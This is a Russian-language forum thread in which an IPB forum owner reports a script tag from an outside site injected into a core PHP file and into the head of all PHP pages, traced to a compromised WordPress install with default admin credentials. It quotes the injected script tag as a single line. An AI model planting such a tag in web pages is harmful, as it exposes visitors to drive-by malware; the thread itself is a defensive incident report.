Перейти к содержанию

Взлом ipb?


andreuka

Рекомендуемые сообщения

Здравствуйте, сегодня обнаружил у меня в ipb подключение js скрипта с сайта stummann.net.

Так вот как этот скрипт появился у меня в /ips_kernel/classDB.php?

Выглядит это както так <script language="JavaScript" src="__stummann.net/steffen/google-analytics/jquery-1.6.5.min.js" type="text/javascript"></script>

 

Само содержание скрипта дает понять что он банально открывает маленький iframe, через который чаще всего распространяются вирусы.

 

Проверяйте свои сообщества! А то побанят всех))

Ссылка на комментарий
Поделиться на другие сайты


Так вот как этот скрипт появился у меня в /ips_kernel/classDB.php?

 

На этот вопрос только расследование взлома может дать ответ. Надо изучать логи, бэкапы и т.д, и т.п.

Ссылка на комментарий
Поделиться на другие сайты

А версия форума последняя? 

Ссылка на комментарий
Поделиться на другие сайты

Уже все расследовал. Теория такая :)
На 1 и том же сервере стоит еще несколько wordpress, на 1 из них стоял стандартный пароль admin admin

Только что прогнал все файлы через антивирус, и именно на том сайте нашел php.shell и php.exploit.

 

Так что это похоже на последствие массовой атаки на wordpress

Ссылка на комментарий
Поделиться на другие сайты

В шапке всех других сайтов тоже появился этот скрипт

 

Он вставляется во всех php файлах где есть </head>

Изменено пользователем andreuka
Ссылка на комментарий
Поделиться на другие сайты

Присоединяйтесь к обсуждению

Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.
Примечание: Ваш пост будет проверен модератором, прежде чем станет видимым.

Гость
Ответить в этой теме...

×   Вставлено с форматированием.   Вставить как обычный текст

  Разрешено использовать не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отображать как обычную ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставлять изображения напрямую. Загружайте или вставляйте изображения по ссылке.

  • Последние посетители   0 пользователей онлайн

    • Ни одного зарегистрированного пользователя не просматривает данную страницу
×
×
  • Создать...